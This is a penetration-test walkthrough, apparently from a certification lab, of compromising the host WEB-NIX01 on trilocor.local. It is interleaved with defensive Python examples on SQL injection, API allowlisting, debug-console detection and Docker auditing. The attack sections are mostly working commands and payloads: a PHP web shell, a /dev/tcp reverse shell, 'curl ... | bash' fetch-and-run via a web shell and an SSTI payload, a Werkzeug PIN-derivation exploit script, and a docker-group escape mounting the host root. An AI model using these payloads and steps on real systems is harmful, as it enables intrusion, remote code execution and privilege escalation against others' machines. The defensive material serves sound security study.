CPTS Report Nov 2024

The document details a series of penetration testing steps conducted on a target server, including port scanning, subdomain enumeration, and exploiting vulnerabilities to gain access. Tools like Nmap, ffuf, feroxbuster, and sqlmap are utilized to identify open ports, discover subdomains, and perform SQL injection attacks. The process culminates in obtaining a reverse shell and escalating privileges through various exploits, leading to the discovery of sensitive information and access to the system.

WEB-NIX01

kali@kali:~$ sudo nmap -p- --min-rate 1000 -T4 10.129.xxx.xxx

Nmap scan report for trilocor.local (10.129.xxx.xxx)
Host is up (0.14s latency).
Not shown: 65524 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
993/tcp  open  imaps
995/tcp  open  pop3s
7777/tcp open  cbt

Nmap done: 1 IP address (1 host up) scanned in 67.52 seconds
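The scan above is the raw attack-surface inventory of WEB-NIX01. As an added example (not part of the report), the following script parses nmap's normal output into structured records and diffs it against an approved-exposure baseline, which is how a defender turns such a scan into an alert on unexpected listeners. The sample output is the report's port table embedded as a string, and EXPECTED_EXPOSURE is a hypothetical baseline chosen for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample: the port table from the report's nmap run against WEB-NIX01
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for trilocor.local (10.129.xxx.xxx)
Host is up (0.14s latency).
Not shown: 65524 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
993/tcp  open  imaps
995/tcp  open  pop3s
7777/tcp open  cbt
Nmap done: 1 IP address (1 host up) scanned in 67.52 seconds
"""

# Hypothetical baseline: what this host is supposed to expose (port, protocol).
EXPECTED_EXPOSURE = {(22, "tcp"), (25, "tcp"), (80, "tcp"), (143, "tcp"), (993, "tcp")}

# One port line of nmap -oN output: "21/tcp   open  ftp"
PORT_LINE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")


@dataclass(frozen=True)
class OpenPort:
    port: int
    proto: str
    service: str


def parse_open_ports(output: str) -> list[OpenPort]:
    """Extract every port nmap reports as open (or open|filtered) from normal output."""
    found = []
    for line in output.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group("state").startswith("open"):
            found.append(OpenPort(int(m.group("port")), m.group("proto"), m.group("service")))
    return found


def unexpected_exposure(open_ports: list[OpenPort], baseline: set) -> list[OpenPort]:
    """Open ports that are not in the approved baseline, sorted by port number."""
    return sorted((p for p in open_ports if (p.port, p.proto) not in baseline),
                  key=lambda p: p.port)


if __name__ == "__main__":
    ports = parse_open_ports(SAMPLE_NMAP_OUTPUT)
    print(f"{len(ports)} open ports found")
    for p in unexpected_exposure(ports, EXPECTED_EXPOSURE):
        print(f"UNEXPECTED {p.port}/{p.proto} ({p.service})")
```

Run against a real `-oN` file, every port that falls outside the baseline (here FTP, DNS, the POP3/IMAP variants, rpcbind and the unidentified service on 7777) becomes a ticket to either document or close; the later steps of the report show that 7777 is the one that matters.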

kali@kali:~$ echo "10.129.xxx.xxx trilocor.local" | sudo tee -a /etc/hosts
10.129.xxx.xxx trilocor.local

trilocor.local

kali@kali:~$ ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://trilocor.local/ -H "Host: FUZZ.trilocor.local" -fl 4662

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://trilocor.local/
 :: Wordlist         : FUZZ: /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.trilocor.local
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response lines: 4662
________________________________________________

portal   [Status: 200, Size: 2423, Words: 873, Lines: 59, Duration: 144ms]
remote   [Status: 200, Size: 1578, Words: 414, Lines: 35, Duration: 142ms]
store    [Status: 200, Size: 13057, Words: 5397, Lines: 301, Duration: 158ms]
dev      [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 4010ms]
blog     [Status: 200, Size: 7489, Words: 233, Lines: 166, Duration: 5064ms]
careers  [Status: 200, Size: 3661, Words: 1025, Lines: 82, Duration: 158ms]
pr       [Status: 200, Size: 21033, Words: 11361, Lines: 300, Duration: 153ms]
:: Progress: [19966/19966] :: Job [1/1] :: 14 req/sec :: Duration: [0:03:58] :: Errors: 0 ::

kali@kali:~$ echo "10.129.xxx.xxx portal.trilocor.local remote.trilocor.local store.trilocor.local dev.trilocor.local blog.trilocor.local careers.trilocor.local pr.trilocor.local" | sudo tee -a /etc/hosts

dev.trilocor.local

kali@kali:~$ feroxbuster --url http://dev.trilocor.local
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `  / \ \_/ | | \ |__
|    |___ |  \ |  \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher                    ver: 2.10.4
───────────────────────────┬──────────────────────
 Target Url                │ http://dev.trilocor.local
 Threads                   │ 50
 Wordlist                  │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 Status Codes              │ All Status Codes!
 Timeout (secs)            │ 7
 User-Agent                │ feroxbuster/2.10.4
 Config File               │ /etc/feroxbuster/ferox-config.toml
 Extract Links             │ true
 HTTP methods              │ [GET]
 Recursion Depth           │ 4
───────────────────────────┴──────────────────────
 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      280c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      283c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       15l       74w     6147c http://dev.trilocor.local/icons/ubuntu-logo.png
200      GET      375l      964w    10918c http://dev.trilocor.local/
200      GET        1l        4w       87c http://dev.trilocor.local/transfer

Visiting http://dev.trilocor.local/transfer, we are redirected to http://securetransfer-dev.trilocor.local.

kali@kali:~$ echo "10.129.xxx.xxx securetransfer-dev.trilocor.local" | sudo tee -a /etc/hosts
10.129.xxx.xxx securetransfer-dev.trilocor.local

Upon successful registration, users are redirected to http://securetransfer-dev.trilocor.local/files.php, which appears to be a file management system.

Generating a PHP reverse shell using revshells.com

Uploading the shell

The download functionality of the website generates URLs with the following structure:

http://securetransfer-dev.trilocor.local/download.php?file=a44bzyaf-7dc5-4570-b815-90d647a58a1f

The ?file parameter is vulnerable to time-based SQL injection. Exploiting this vulnerability allows us to extract the real path of the uploaded shell.
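The root cause behind the download.php finding is that the file token reaches the SQL engine as text rather than as a bound value. The following is an added example, not code from the report or from the securetransfer application, that puts the vulnerable lookup beside the parameterized one. It assumes a constructed `files` table (token to stored path) and uses an in-memory SQLite database, which has no SLEEP() function, so the same root cause is shown with a boolean tautology instead of the time-based technique sqlmap used.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table: a public download token maps to a stored path."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE files (id INTEGER PRIMARY KEY, token TEXT, path TEXT)")
    conn.executemany("INSERT INTO files (token, path) VALUES (?, ?)", [
        ("a44bzyaf-7dc5-4570-b815-90d647a58a1f", "storage/1_report.pdf"),
        ("0f0f0f0f-1111-4222-8333-444444444444", "storage/2_92f8fd55-5100-4730-b313-ae83e4ea51b3.php"),
    ])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, token: str) -> list[str]:
    """Interpolates the request parameter into the statement: the token is parsed as SQL."""
    sql = f"SELECT path FROM files WHERE token = '{token}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, token: str) -> list[str]:
    """Binds the parameter: the driver passes it as a value, never as SQL syntax."""
    return [row[0] for row in conn.execute("SELECT path FROM files WHERE token = ?", (token,))]


# Minimal tautology used only to show the WHERE clause being rewritten.
PAYLOAD = "x' OR '1'='1"
GOOD_TOKEN = "a44bzyaf-7dc5-4570-b815-90d647a58a1f"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, real token     :", lookup_vulnerable(db, GOOD_TOKEN))
    print("vulnerable, payload        :", lookup_vulnerable(db, PAYLOAD))
    print("parameterized, real token  :", lookup_parameterized(db, GOOD_TOKEN))
    print("parameterized, payload     :", lookup_parameterized(db, PAYLOAD))
```

With string interpolation the payload turns the lookup into `token = 'x' OR '1'='1'` and every stored path, including the uploaded shell, comes back; with a bound parameter the same input is compared literally and matches nothing. Escaping or filtering on the way in is not a substitute: the fix is the bound parameter, plus serving downloads by database id rather than by any path the row contains.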

kali@kali:~$ cat request.txt
GET /download.php?file=* HTTP/1.1
Host: securetransfer-dev.trilocor.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://securetransfer-dev.trilocor.local/files.php
Cookie: PHPSESSID=12ersd0u397tqsv8a6ur13ut4q
Upgrade-Insecure-Requests: 1

kali@kali:~$ sqlmap -r request.txt --dbms=mysql --batch --dbs

Dumping Databases

kali@kali:~$ sqlmap -r request.txt --dbms=mysql --batch -D securetransfer --tables

Dumping tables

kali@kali:~$ sqlmap -r request.txt --dbms=mysql --batch -D securetransfer -T files --columns --dump

Dumping columns

Dumping rows of table

kali@kali:~$ curl http://securetransfer-dev.trilocor.local/storage/2_92f8fd55-5100-4730-b313-ae83e4ea51b3.php

Reverse Shell
The reverse shell gives access to a Docker container, which can be identified by the presence of the .dockerenv file.

Within the apps/ directory, a file named oszip_data.zip was found.

$ mv apps/oszip_data.zip /var/www/html/storage

Downloading the file

kali@kali:~$ wget http://securetransfer-dev.trilocor.local/oszip_data.zip

oszip_data.zip

README.md

Adding osticketapp.trilocor.local to /etc/hosts:

kali@kali:~$ echo "10.129.xxx.xxx osticketapp.trilocor.local" | sudo tee -a /etc/hosts

The password hash of the Administrator user was found in config.sql.

kali@kali:~/Desktop/CPTS$ hashcat -m 3200 hash ~/Desktop/rockyou.txt
kali@kali:~/Desktop/CPTS$ hashcat -m 3200 hash ~/Desktop/rockyou.txt --show
$2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2QiQKyH88.:administracion
OSTicket - Welcome Page

OSTicket - Login Page

Having the administrator account, we can proceed to the agent login page.

OSTicket - Agent Login

OSTicket - Open Tickets

Adding gogsusdev01.trilocor.local to /etc/hosts:

kali@kali:~$ echo "10.129.xxx.xxx gogsusdev01.trilocor.local" | sudo tee -a /etc/hosts

gogsusdev01.trilocor.local
After registering, we are redirected to the home page!

Gogs - Home Page

Gogs - Public Repos

This repository contained the documentation for the API running at uat01-eu.intranet.trilocor.local.

Adding uat01-eu.intranet.trilocor.local to /etc/hosts:

kali@kali:~$ echo "10.129.xxx.xxx uat01-eu.intranet.trilocor.local" | sudo tee -a /etc/hosts

By understanding the API through its documentation, we can exploit it to gain shell access.

kali@kali:~$ curl -s -X POST 'http://uat01-eu.intranet.trilocor.local/auth/register' -d '{"username":"hacker", "password":"P4ssword!", "email":"hacker@htb.com"}' -H 'Content-Type: application/json'
{"message":"Registration Successful."}

kali@kali:~$ curl -s -X POST 'http://uat01-eu.intranet.trilocor.local/auth/login' -d '{"username":"hacker", "password":"P4ssword!"}' -H 'Content-Type: application/json'
{"message":"Authentication Successful.","id":2,"username":"hacker","email":"hacker@htb.com","role":"public","token":"PHPSESSID=vo1sev7hr4p7rinpta7qpeh8el"}

kali@kali:~$ curl -s -X POST 'http://uat01-eu.intranet.trilocor.local/auth/update' -d '{"role":"admin"}' -b "PHPSESSID=vo1sev7hr4p7rinpta7qpeh8el" -H 'Content-Type: application/json'
{"message":"User details successfully updated. Please re-login to activate the changes."}

kali@kali:~$ curl -s -X POST 'http://uat01-eu.intranet.trilocor.local/auth/login' -d '{"username":"hacker", "password":"P4ssword!"}' -H 'Content-Type: application/json'
{"message":"Authentication Successful.","id":2,"username":"hacker","email":"hacker@htb.com","role":"admin","token":"PHPSESSID=d40ji5im7r9akhg22bvtnp1nej"}

kali@kali:~$ curl -s -X POST 'http://uat01-eu.intranet.trilocor.local/support/add' -d '{"ticket":"<?php system($_GET['cmd']);?>"}' -b "PHPSESSID=d40ji5im7r9akhg22bvtnp1nej" -H 'Content-Type: application/json'
{"status":"success","message":"Support ticket submitted successfully."}

kali@kali:~$ curl -s -X POST 'http://uat01-eu.intranet.trilocor.local/support/export/1' -d '{"type":"json.php"}' -b "PHPSESSID=d40ji5im7r9akhg22bvtnp1nej" | jq -r '.url'
http://uat01-eu.intranet.trilocor.local/exports/tickets_2_20240713205305_92507f97_8f18_48a5_8f52_29748855de6b.json.php

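Two API weaknesses chain together in the exchange above: /auth/update accepts whatever fields the client sends, so a user can assign themselves the admin role (mass assignment), and /support/export takes the file extension from the request, so ticket content is written to a file the web server executes. The following is an added example of the server-side allowlisting that closes both, not code from the report or from the intranet API. The field names, the export format table and the filename layout are assumptions made for illustration.

```python
import re

# Fields a logged-in user may change on their own account. 'role' is deliberately absent:
# privilege changes go through a separate, admin-only path.
USER_EDITABLE_FIELDS = {"email", "password", "display_name"}

# Export formats the endpoint may produce, mapped to the extension the server writes.
# The client chooses a key; it never supplies the extension.
EXPORT_TYPES = {"json": ".json", "csv": ".csv"}


class RejectedField(ValueError):
    """Raised when a client tries to set a field it is not allowed to set."""


def apply_profile_update(user: dict, payload: dict) -> dict:
    """Return a copy of `user` with only allowlisted fields changed.
    Unknown fields are rejected loudly rather than silently dropped, so that a
    request carrying {"role": "admin"} shows up in application logs."""
    unknown = set(payload) - USER_EDITABLE_FIELDS
    if unknown:
        raise RejectedField(f"fields not updatable by the user: {sorted(unknown)}")
    updated = dict(user)
    updated.update(payload)
    return updated


def export_filename(user_id: int, ticket_id: int, export_type: str, stamp: str) -> str:
    """Build the export filename from server-controlled parts only.
    The extension comes from the EXPORT_TYPES table, so a request for "json.php"
    fails instead of producing an executable file in the exports directory."""
    ext = EXPORT_TYPES.get(export_type)
    if ext is None:
        raise ValueError(f"unsupported export type: {export_type!r}")
    if not re.fullmatch(r"\d{14}", stamp):
        raise ValueError("timestamp must be 14 digits (YYYYMMDDhhmmss)")
    return f"tickets_{user_id}_{ticket_id}_{stamp}{ext}"


if __name__ == "__main__":
    # Constructed user record mirroring the report's registered account.
    user = {"id": 2, "username": "hacker", "email": "hacker@htb.com", "role": "public"}
    print(apply_profile_update(user, {"email": "new@example.com"}))
    try:
        apply_profile_update(user, {"role": "admin"})
    except RejectedField as e:
        print("rejected:", e)
    print(export_filename(2, 1, "json", "20240713205305"))
    try:
        export_filename(2, 1, "json.php", "20240713205305")
    except ValueError as e:
        print("rejected:", e)
```

Even with the extension fixed, exported ticket bodies should live outside the document root and be served through a handler that sets `Content-Disposition: attachment`, so that user-supplied text is never interpreted by the web server regardless of what the file is called.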
Create a Reverse Shell Script

On your Kali machine, create a simple reverse shell script and serve it using Python’s HTTP server:
kali@kali:~$ echo "sh -i >& /dev/tcp/10.10.14.4/1234 0>&1" > shell
kali@kali:~$ python3 -m http.server 80

This will make the shell file accessible over HTTP on port 80.

Start a Netcat Listener

Prepare a listener to catch the reverse shell:
kali@kali:~$ nc -nvlp 1234

Trigger the Shell on the Target

Use the vulnerable endpoint to download and execute the shell script on the target system:
kali@kali:~$ curl "http://uat01-eu.intranet.trilocor.local/exports/tickets_2_20240713205305_92507f97_8f18_48a5_8f52_29748855de6b.json.php?cmd=curl%20http%3A%2F%2F10.10.14.4%2Fshell%20%7C%20bash"

Verify the Connection

Once executed, you should see a connection from the target system, giving you an interactive shell.
$ dir /home
websvc srvadm

$ ps auxww | grep srvadm
srvadm  1375  0.0  0.4  34240 26628 ?  Ss  17:30  0:00 /usr/bin/python3 /home/srvadm/budget_calculator/server.py
srvadm  1580  0.0  0.3  34820 23760 ?  S   17:30  0:00 /usr/bin/python3 /home/srvadm/budget_calculator/server.py
srvadm  1598  0.0  0.4  34240 26696 ?  S   17:30  0:00 /usr/bin/python3 /home/srvadm/budget_calculator/server.py
srvadm  1673  0.1  0.4 108956 25332 ?  Sl  17:30  0:19 /usr/bin/python3 /home/srvadm/budget_calculator/server.py

The /home/srvadm/budget_calculator/server.py is a website used to calculate budgets and is listening on port 7777.

kali@kali:~$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt:FUZZ -u http://trilocor.local:7777/FUZZ -ac | grep -v '#'

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://trilocor.local:7777/FUZZ
 :: Wordlist         : FUZZ: /opt/useful/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

console  [Status: 200, Size: 1563, Words: 330, Lines: 46, Duration: 153ms]

Budget Calculator - PIN Protected Werkzeug Console

The Werkzeug console PIN can be derived by reversing the algorithm used by Werkzeug to generate it.

Collecting essential information

websvc@WEB-NIX01:/var/www/html/_intranet/exports$ python3 -c "import uuid; print(str(uuid.getnode()))"
21108751877517
websvc@WEB-NIX01:/var/www/html/_intranet/exports$ cat /etc/machine-id
49967d13a6e2400c9aa2ce8a2a217dbe
websvc@WEB-NIX01:/var/www/html/_intranet/exports$ cat /proc/1673/cgroup | head -1 | awk -F'/' '{print $3}'
budget.service

Werkzeug Console PIN Exploit

import hashlib
from itertools import chain

# Public bits: the user running the app, the module name, the app class name
# and the absolute path of flask/app.py on the target
probably_public_bits = [
    'srvadm',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.8/dist-packages/flask/app.py'
]

# Private bits: the MAC address as a decimal integer (uuid.getnode()) and
# /etc/machine-id concatenated with the cgroup name of the server process
private_bits = [
    '21108751877517',
    '49967d13a6e2400c9aa2ce8a2a217dbebudget.service'
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    # Werkzeug groups the 9 digits as 3 groups of 3 for display
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

kali@kali:~$ python3 exploit.py
141-750-565
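The PIN above protects nothing once an attacker can read host identifiers, so the defensive takeaway is twofold: never run Flask with debug enabled on a reachable interface, and treat any request to the debugger console as an incident. As an added example (not part of the report), the following detection parses combined-format access log lines and classifies Werkzeug console traffic into console page loads, PIN authentication attempts and executed commands. The log lines are constructed for illustration; the query-parameter names are the ones Werkzeug's debugger uses (`__debugger__=yes`, `cmd=pinauth`, `cmd=<code>`), and the brute-force threshold is an assumption.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access log for a Flask app like the budget calculator on 7777.
SAMPLE_LOG = """\
10.10.14.4 - - [13/Jul/2024:20:53:05 +0000] "GET / HTTP/1.1" 200 1563 "-" "Mozilla/5.0"
10.10.14.4 - - [13/Jul/2024:20:53:06 +0000] "GET /console HTTP/1.1" 200 1563 "-" "Mozilla/5.0"
10.10.14.4 - - [13/Jul/2024:20:53:07 +0000] "GET /console?__debugger__=yes&cmd=pinauth&pin=000-000-001&s=Abc HTTP/1.1" 200 38 "-" "Mozilla/5.0"
10.10.14.4 - - [13/Jul/2024:20:53:08 +0000] "GET /console?__debugger__=yes&cmd=pinauth&pin=000-000-002&s=Abc HTTP/1.1" 200 38 "-" "Mozilla/5.0"
10.10.14.4 - - [13/Jul/2024:20:53:09 +0000] "GET /console?__debugger__=yes&cmd=pinauth&pin=141-750-565&s=Abc HTTP/1.1" 200 38 "-" "Mozilla/5.0"
10.10.14.4 - - [13/Jul/2024:20:53:10 +0000] "GET /console?__debugger__=yes&cmd=__import__%28%27os%27%29.popen%28%27id%27%29.read%28%29&frm=0&s=Abc HTTP/1.1" 200 60 "-" "Mozilla/5.0"
192.168.1.20 - - [13/Jul/2024:20:54:00 +0000] "GET /calc?x=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# cmd values the console issues on its own: static assets and "print PIN to server log".
HARMLESS_CMDS = {"resource", "printpin"}


def classify(line: str):
    """Return (kind, source_ip) for a request touching the Werkzeug console, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != "/console":
        return None
    qs = parse_qs(url.query)
    if qs.get("__debugger__") != ["yes"]:
        return ("console_page", m.group("src"))   # the console HTML itself was served
    cmd = qs.get("cmd", [""])[0]
    if cmd == "pinauth":
        return ("pinauth", m.group("src"))        # one PIN guess
    if cmd in HARMLESS_CMDS:
        return None
    return ("console_command", m.group("src"))    # Python evaluated inside the app process


def detect(log: str) -> list[tuple[str, str, int]]:
    """Aggregate console activity as sorted (kind, source, count) triples."""
    counts = Counter(e for e in map(classify, log.splitlines()) if e)
    return sorted((kind, src, n) for (kind, src), n in counts.items())


def alerts(log: str, pin_attempts_threshold: int = 3) -> list[str]:
    """Turn the aggregate into alert strings; any console activity at all is reportable."""
    out = []
    for kind, src, n in detect(log):
        if kind == "console_page":
            out.append(f"{src}: debugger console served {n}x; the app is running with debug enabled")
        elif kind == "pinauth" and n >= pin_attempts_threshold:
            out.append(f"{src}: {n} console PIN attempts; possible brute force or derived PIN")
        elif kind == "console_command":
            out.append(f"{src}: {n} command(s) executed through the debugger console")
    return out


if __name__ == "__main__":
    for a in alerts(SAMPLE_LOG):
        print(a)
```

A successful pinauth followed by a cmd that is neither `resource` nor `pinauth` is the signature of the sequence the report performed; the only real fix is removing debug mode from the deployment (`app.run(debug=False)`, no `FLASK_DEBUG=1` in the service unit) and, if the debugger must exist in a lab, binding it to localhost.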
Create a Reverse Shell Script
On your Kali machine, create a simple reverse shell script and serve it using Python’s HTTP server:

kali@kali:~$ echo "sh -i >& /dev/tcp/10.10.14.4/1234 0>&1" > shell
kali@kali:~$ python3 -m http.server 80

This will make the shell file accessible over HTTP on port 80.

Start a Netcat Listener
Prepare a listener to catch the reverse shell:

kali@kali:~$ nc -nvlp 1234

Execute the Payload on the Target

Use the following SSTI payload to download and execute the shell file:
__import__('os').popen('curl http://10.10.14.4/shell | bash').read();

This curl command downloads the shell script from your Python server (10.10.14.4) and pipes it to bash for execution.

Verify the Connection

After executing the curl command, switch to your Netcat listener (nc -nvlp 1234) on Kali Linux. You should see a connection from the target system, providing you with a shell.

$ id
uid=1002(srvadm) gid=1002(srvadm) groups=1002(srvadm),119(docker)

User srvadm is a member of the docker group, which can be exploited by creating a privileged container and mounting the host filesystem to read /root/.ssh/id_rsa.

$ docker -H unix:///run/docker.sock ps
CONTAINER ID   IMAGE                COMMAND                  CREATED         STATUS                     PORTS                                 NAMES
c8601dccf970   securetransferprod   "/bin/bash /usr/loca…"   32 months ago   Up About an hour           127.0.0.1:8009->80/tcp                securetransferprod
271aa23cdb55   joomla:latest        "/entrypoint.sh apac…"   13 months ago   Up About an hour           127.0.0.1:8010->80/tcp                joomla
969e7d72c601   tmp_dev              "/bin/sh -c 'apachec…"   13 months ago   Up About an hour           127.0.0.1:8007->80/tcp                dev
10e0e001c729   tmp_vpn              "/bin/sh -c 'apachec…"   13 months ago   Up About an hour           127.0.0.1:8008->80/tcp                vpn
d2e4d0187c4c   tmp_pr               "/bin/sh -c 'apachec…"   03 months ago   Up About an hour           127.0.0.1:8001->80/tcp                pr
8dbabee686cc   tmp_osticket         "sh -c '/usr/sbin/se…"   03 months ago   Up About an hour           127.0.0.1:8005->80/tcp                osticket
8c14dfacb96d   gogs/gogs:latest     "/app/gogs/docker/st…"   03 months ago   Up About an hour (healthy) 22/tcp, 127.0.0.1:8006->3000/tcp      gogs
d83970ae0de2   tmp_hr               "/bin/sh -c 'apachec…"   03 months ago   Up About an hour           127.0.0.1:8003->80/tcp                hr
04b86ab0ee13   tmp_jobs             "httpd -DFOREGROUND"     03 months ago   Up About an hour           127.0.0.1:8002->80/tcp                jobs
6dcb61a613da   mariadb:latest       "docker-entrypoint.s…"   03 months ago   Up About an hour           3306/tcp                              joomladb
74193b2cce38   tmp_shop             "/bin/sh -c 'apachec…"   03 months ago   Up About an hour           127.0.0.1:8004->80/tcp                shop

$ docker -H unix:///run/docker.sock run --rm -d --privileged -v /:/hostsystem securetransferprod
82b123332853f532af23cb0b0f50047c6dcb1fc6a2cfab0d7bf2f7bd631cfcfe
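Membership of the docker group is root-equivalent because the daemon will happily start a privileged container with the host root bind-mounted, exactly as above. As an added example (not part of the report), the following audit script does the two checks a defender would schedule on a Docker host: list who is in the docker group from /etc/group, and walk `docker inspect` output for containers that are privileged, carry dangerous capabilities or bind-mount sensitive host paths. The inspect records and group file are constructed samples; the second container mirrors the `run --privileged -v /:/hostsystem` invocation in the report, and its name is invented.

```python
import json

# Constructed `docker inspect` excerpts with the HostConfig fields the audit needs.
SAMPLE_INSPECT = json.dumps([
    {"Id": "c8601dccf970", "Name": "/securetransferprod",
     "HostConfig": {"Privileged": False, "Binds": None, "CapAdd": None}},
    {"Id": "82b123332853f532af23cb0b0f50047c6dcb1fc6a2cfab0d7bf2f7bd631cfcfe",
     "Name": "/hostroot_probe",   # invented name; docker assigns a random one for `run` without --name
     "HostConfig": {"Privileged": True, "Binds": ["/:/hostsystem"], "CapAdd": None}},
    {"Id": "aaaaaaaaaaaa", "Name": "/build_agent",
     "HostConfig": {"Privileged": False, "Binds": ["/var/run/docker.sock:/var/run/docker.sock:ro"],
                    "CapAdd": ["SYS_ADMIN"]}},
])

# Constructed /etc/group content for the host in the report.
SAMPLE_ETC_GROUP = """\
root:x:0:
sudo:x:27:
docker:x:119:srvadm,websvc
"""

# Host paths that give a container control of the host when mounted.
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/proc", "/sys", "/dev",
                        "/var/run/docker.sock", "/run/docker.sock")
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH"}


def mount_is_sensitive(src: str) -> bool:
    """True for '/' itself and for anything at or below a sensitive host path."""
    src = src.rstrip("/") or "/"
    if src == "/":
        return True
    return any(src == p or src.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def audit_containers(inspect_json: str) -> list[str]:
    """Findings, one string per problem, in the order containers appear."""
    findings = []
    for c in json.loads(inspect_json):
        name = c["Name"].lstrip("/")
        hc = c.get("HostConfig") or {}
        if hc.get("Privileged"):
            findings.append(f"{name}: privileged container")
        for bind in hc.get("Binds") or []:
            parts = bind.split(":")            # src:dst[:options]
            src, dst = parts[0], parts[1] if len(parts) > 1 else "?"
            if mount_is_sensitive(src):
                findings.append(f"{name}: host path {src} bind-mounted at {dst}")
        for cap in hc.get("CapAdd") or []:
            if cap.upper().removeprefix("CAP_") in DANGEROUS_CAPS:
                findings.append(f"{name}: capability {cap} added")
    return findings


def docker_group_members(etc_group: str) -> list[str]:
    """Users listed on the docker: line of /etc/group (each is effectively root)."""
    for line in etc_group.splitlines():
        parts = line.split(":")
        if len(parts) == 4 and parts[0] == "docker":
            return [m for m in parts[3].split(",") if m]
    return []


if __name__ == "__main__":
    print("docker group:", docker_group_members(SAMPLE_ETC_GROUP))
    for f in audit_containers(SAMPLE_INSPECT):
        print("FINDING", f)
```

On a live host the same functions run over `docker inspect $(docker ps -q)` and `cat /etc/group`. The remediation for the report's path is to remove srvadm from the docker group (rootless Docker or a sudo rule scoped to specific compose commands are the usual replacements) and to alert on any container that is started privileged or with a bind of `/`.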

$ docker -H unix:///run/docker.sock exec -it 82b123332853 /bin/bash
root@82b123332853:/# cd /hostsystem/root/
root@82b123332853:/hostsystem/root# ls -la
total 64
drwx------  7 root root  4096 Jul 13 17:31 .
drwxr-xr-x 20 root root  4096 Aug 22  2022 ..
lrwxrwxrwx  1 root root     9 Aug  3  2022 .bash_history -> /dev/null
-rw-r--r--  1 root root  3106 Dec  5  2019 .bashrc
drwx------  3 root root  4096 Aug  3  2022 .cache
drwx------  3 root root  4096 Aug 18  2022 .config
drwxr-xr-x  3 root root  4096 Aug  3  2022 .local
-rw-r--r--  1 root root   161 Dec  5  2019 .profile
-rw-------  1 root root    39 Aug  8  2022 .python_history
drwx------  2 root root  4096 Aug  3  2022 .ssh
-rw-------  1 root root 15201 Sep 14  2022 .viminfo
-rw-r--r--  1 root root   215 Aug  3  2022 .wget-hsts
